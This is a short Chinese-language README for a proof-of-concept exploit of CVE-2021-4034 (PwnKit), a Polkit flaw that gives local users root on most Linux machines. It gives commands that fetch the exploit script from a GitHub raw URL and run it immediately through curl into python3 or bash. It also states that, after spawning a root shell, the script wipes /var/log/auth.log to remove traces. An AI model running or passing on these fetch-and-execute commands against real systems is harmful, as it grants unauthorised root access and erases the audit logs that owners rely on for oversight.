██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
由 Kim Schulz 为 CVE-2021-4034 编写的 Python3 和 BASH PoC
这是针对新发现的 Polkit 错误 PwnKit 的一个简单 PoC。
我同时制作了 bash 和 python3 两个版本——纯粹是为了好玩。
这个问题非常容易被利用,但后果极其严重,因为在大多数 Linux 机器上,只要攻击者拥有本地用户访问权限,就能轻松获得 root 权限。
这些脚本是一次性执行,只需运行
python3 pkwner.py
或
bash pkwner.sh
你也可以通过 Web 服务器(例如本 GitHub 仓库)直接运行:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
或
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
两种方式运行后,效果大致如下:
以及

脚本会创建一些文件和文件夹,但在弹出 root shell 后会自行清理——它甚至会清理 /var/log/auth.log(为什么不呢)。